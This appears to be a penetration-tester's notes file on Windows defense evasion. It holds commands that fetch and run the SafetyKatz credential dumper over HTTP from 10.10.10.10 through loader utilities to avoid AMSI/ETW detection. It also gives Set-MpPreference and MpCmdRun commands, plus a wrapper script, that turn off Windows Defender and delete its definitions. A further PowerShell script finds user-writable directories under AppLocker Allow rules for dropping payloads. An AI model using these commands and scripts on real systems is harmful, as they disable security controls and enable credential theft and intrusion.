# notes

## Tools

<https://github.com/Raptoratack/ADTools>

## Bypass AMSI

**Bypass AMSI- and ETW-based detection by loading the binary through the loader utility instead of running it directly (`Loader.exe` fetches the target over HTTP; `AssemblyLoad.exe` fetches `Loader.exe` first, which then fetches the target)**

```
C:\Users\Public\Loader.exe -path http://10.10.10.10/SafetyKatz.exe
C:\Users\Public\AssemblyLoad.exe http://10.10.10.10/Loader.exe -path http://10.10.10.10/SafetyKatz.exe
```

## Bypass Real-Time Monitoring

```
Powershell Set-MpPreference -DisableRealtimeMonitoring $true
Powershell Set-MpPreference -DisableIOAVProtection $true
Powershell Set-MpPreference -DisableAutoExclusions $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```

**Needs local admin. If Tamper Protection is enabled, the Set-MpPreference changes return without error but are silently ignored, so re-read the Defender status afterwards instead of trusting the command. Turning real-time protection off is written to the Microsoft-Windows-Windows Defender/Operational log (event ID 5001), so expect a SOC to see it.**
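The same steps wrapped in a before/after check, as an added example (not part of the original notes). It snapshots `Get-MpComputerStatus`, applies the commands above, and reports which fields actually changed, because Tamper Protection discards the real-time change without raising an error. It assumes an elevated session and the built-in Defender module; the snapshot field names are the real `Get-MpComputerStatus` properties.

```powershell
# Added example, not from the original notes: snapshot Defender state, apply the
# commands from the notes, then re-read the state to see which changes took effect.
# Set-MpPreference returns without error even when Tamper Protection silently
# discards the change, so the before/after comparison is the real check.
# Requires an elevated session; assumes the built-in Defender module is present.

function Get-DefenderSnapshot {
    $s = Get-MpComputerStatus
    [pscustomobject]@{
        RealTime        = $s.RealTimeProtectionEnabled
        IOAV            = $s.IoavProtectionEnabled
        TamperProtected = $s.IsTamperProtected
        RunningMode     = $s.AMRunningMode
        Signatures      = $s.AntivirusSignatureVersion
    }
}

$before = Get-DefenderSnapshot
if ($before.TamperProtected) {
    Write-Warning 'Tamper Protection is on: the Set-MpPreference changes below will be ignored.'
}

# The same steps as in the notes
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableAutoExclusions $true
& "$env:ProgramFiles\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All | Out-Null

# Re-read and compare field by field
$after = Get-DefenderSnapshot
foreach ($f in 'RealTime', 'IOAV', 'Signatures', 'RunningMode') {
    $changed = if ("$($before.$f)" -ne "$($after.$f)") { 'CHANGED' } else { 'unchanged' }
    '{0,-11} {1,-9} before={2,-16} after={3}' -f $f, $changed, $before.$f, $after.$f
}
if ($after.RealTime) {
    Write-Warning 'Real-time protection is still enabled; the bypass did not take.'
}
```

If `RealTime` stays `True` after the run, the cause is almost always Tamper Protection or a Defender policy pushed by GPO/MDM, neither of which `Set-MpPreference` can override.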

## Bypassing AppLocker & WDAC

**Check whether PowerShell is running in ConstrainedLanguage mode (usually enforced by AppLocker script rules or WDAC)**

```
$ExecutionContext.SessionState.LanguageMode
```

**Check the AppLocker policy (application whitelisting) via the AppLocker PowerShell module and the registry (reg.exe). The module cmdlet may be unavailable or blocked; the SrpV2 keys hold the same rules as XML strings and are normally readable by a standard user**

```
Get-AppLockerPolicy -Effective
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2"
Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2\Exe"
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2 /s
```
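A combined enumeration script for the two checks above (language mode and the AppLocker policy), as an added example that is not part of the original notes. It reads the rules straight from the SrpV2 registry keys, prints the enforcement mode per collection, and for every Allow path rule tests whether the rule's directory, or a well-known subdirectory under it, is writable by the current user, since those are the first places to try dropping a payload under the policy. It assumes the standard SrpV2 layout (`EnforcementMode` DWORD with 1 = enforce, 0 = audit only, absent = not configured; one XML rule per GUID subkey in its `Value` string), the standard AppLocker path-variable mappings, and a short constructed list of candidate subdirectories that you should extend for the target. It uses cmdlets and property access only, so it should also run under ConstrainedLanguage mode.

```powershell
# Added example, not part of the original notes: enumerate the AppLocker policy from
# the registry (no AppLocker module needed), print enforcement mode per collection,
# and flag Allow path rules whose directory (or a well-known subdirectory of it) is
# writable by the current user.
#
# Assumptions (not stated in the notes): standard SrpV2 layout
#   <SrpV2>\<Collection>\EnforcementMode     DWORD (1 = enforce, 0 = audit only, absent = not configured)
#   <SrpV2>\<Collection>\<RuleGuid>\Value    REG_SZ holding one XML rule element
# and the standard AppLocker path variables mapped below.

$srp = 'HKLM:\Software\Policies\Microsoft\Windows\SrpV2'

# AppLocker path variables -> real filesystem locations (assumed standard mappings)
$pathVars = @{
    '%OSDRIVE%'      = $env:SystemDrive
    '%WINDIR%'       = $env:windir
    '%SYSTEM32%'     = "$env:windir\System32"
    '%PROGRAMFILES%' = $env:ProgramFiles
}

# Subdirectories under the usual Allow-rule roots that are often user-writable.
# Constructed starting list for this example; extend it for your target.
$wellKnownSubdirs = @(
    "$env:windir\Tasks",
    "$env:windir\Temp",
    "$env:windir\tracing",
    "$env:windir\System32\spool\drivers\color"
)

function Expand-AppLockerPath([string]$p) {
    foreach ($var in $pathVars.Keys) {
        $p = $p -replace [regex]::Escape($var), $pathVars[$var]
    }
    return $p
}

# Create and delete a random file: reflects the effective ACL without parsing it.
function Test-WritableDir([string]$dir) {
    if (-not $dir) { return $false }
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) { return $false }
    $probe = Join-Path $dir ('probe-' + [guid]::NewGuid().ToString() + '.tmp')
    try {
        New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

"LanguageMode: $($ExecutionContext.SessionState.LanguageMode)"
if (-not (Test-Path $srp)) { "No AppLocker policy under $srp"; return }

foreach ($coll in Get-ChildItem -Path $srp) {
    $mode = (Get-ItemProperty -Path $coll.PSPath -Name EnforcementMode -ErrorAction SilentlyContinue).EnforcementMode
    $modeText = if ($mode -eq 1) { 'Enforce' } elseif ($mode -eq 0) { 'AuditOnly' } else { 'NotConfigured' }
    ''
    "== $($coll.PSChildName) [$modeText]"

    foreach ($ruleKey in Get-ChildItem -Path $coll.PSPath) {
        $raw = (Get-ItemProperty -Path $ruleKey.PSPath -Name Value -ErrorAction SilentlyContinue).Value
        if (-not $raw) { continue }
        $rule = ([xml]$raw).DocumentElement   # FilePathRule / FilePublisherRule / FileHashRule

        # $rule.Name is the rule's Name attribute; the element name is $rule.LocalName
        '  {0,-17} {1,-5} {2,-12} {3}' -f $rule.LocalName, $rule.Action, $rule.UserOrGroupSid, $rule.Name

        if ($rule.LocalName -ne 'FilePathRule' -or $rule.Action -ne 'Allow') { continue }

        foreach ($cond in $rule.Conditions.FilePathCondition) {
            $expanded = Expand-AppLockerPath $cond.Path
            # Directory part before the first wildcard, e.g. %WINDIR%\* -> C:\Windows
            $root = ($expanded -split '\*')[0].TrimEnd('\')
            if (-not $root) { "    !! '$($cond.Path)' allows every path"; continue }

            $candidates = @($root) + @($wellKnownSubdirs | Where-Object { $_ -like "$root\*" })
            foreach ($dir in $candidates) {
                if (Test-WritableDir $dir) { "    !! writable under allow rule: $dir" }
            }
        }
    }
}
```

Lines marked `!!` are the ones to look at: a writable directory covered by an Allow path rule means anything dropped there runs under that rule for the listed SID, and a collection reported as `AuditOnly` or `NotConfigured` is not blocking at all. Publisher and hash rules are printed but not tested, since they cannot be satisfied by choosing a path.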
